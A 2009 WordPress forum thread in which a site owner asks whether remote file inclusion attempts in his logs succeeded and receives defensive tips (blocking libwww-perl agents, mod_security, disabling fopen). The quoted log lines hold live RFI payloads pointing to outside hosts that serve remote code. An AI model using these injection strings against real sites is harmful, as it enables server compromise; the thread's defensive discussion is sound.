Remote File Inclusion (RFI) Attempts

  • Hi, all. I’ve had a bunch of remote file inclusion attempts today – they’ve been hammering away at my domain. I’ve done my best to research the subject but I’m starting from scratch – I knew nothing about it until this evening.

    I’m poring through my server logs and trying to see if the attacks have been successful. Mostly I see 404’s, which I’ve been told probably means that specific attempt was not successful. But in some cases I see like the following, with a 200 success indication:

    97.106.184.215 – – [29/Apr/2009:20:24:56 -0500] “GET /wp-content/plugins/gd-star-rating/css/gdstarating.css.php?s=astarscape%7C20%7C3%7Cpng%7C1%23moxygen%7C20%7C20%7Cpng%7C1 HTTP/1.1” 200 7955 “https://blogingenuity.com/2009/04/08/how-to-validating-your…site-the-easy-way-part-2/%20%20/errors.php?error=https://www.sanbokyodan.fr/editor/xml/copyright.txt??” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5”

    I don’t know if this means the attempt was successful and I need to start worrying or what.

    Could anyone who’s experienced this shed some light on:
    1) How can I tell if an attempt was successful and what’s the next step?
    2) How can I best prevent the attacks in the first place

    Thanks in advance.

Viewing 5 replies - 1 through 5 (of 5 total)

  • what do you see when you put that into a browser?

    Thread Starter asechrest

    (@asechrest)

    I get a page not found notice, which I think is good news. But I have hundreds of these today, from what look like a number of different sources. Some of them appear to be trying to load a text file. I have a bunch similar to this:

    209.62.42.242 – – [29/Apr/2009:15:36:49 -0500] “GET /2009/04/08//vwar/backup/errors.php?error=https://caketaker.biz//scrollerroller/id.txt??? HTTP/1.1” 404 40489 “-” “Mozilla/5.0”

    I’ve searched my server filesystem for the text file name and it hasn’t been found. This is also, I think, good news.

    Generally, though, I’m wondering if I can simply determine if they successfully added a page or successfully loaded a file to my server, and if the answer is no to both, can I feel relatively comfortable (not assured, obviously) that the attempts failed?

    I’m researching how to prevent the attempts altogether. I’ve checked my file/folder permissions and they seem to be what’s recommended. I’ve read some suggestions not to use “fopen” but understanding that is a bit above me at the moment.

    Thanks for the response.

    they failed.

    what theyre trying to load is right here,

    https://www.//sanbokyodan.//fr/editor/xml/copyright.txt

    link broke.

    one of the easiest ways to thwart a lot (not all, just a lot) of rfi attempts is to disallow any libwww-perl user-agents.

    RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^.*$ - [F]

    Thats one way.

    Some will argue with me, but mod_security is also excellent at stopping them.

    Of course the best way is yes, to not use fopen. You can disable it in the php.ini.

    Thread Starter asechrest

    (@asechrest)

    Ok, I’ll take a look at implementing those and do some more research to see if not using fopen has any negatives.

    Thanks whooami.

    Thread Starter asechrest

    (@asechrest)

    For anyone new to RFI who comes across this thread in the future…

    After Whooami’s help and additional research, I wrote up a little beginners guide to tracking and mitigating Remote File Inclusion.

    Constructive criticism or corrections from those more knowledgeable than me is welcomed.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Remote File Inclusion (RFI) Attempts’ is closed to new replies.

Tags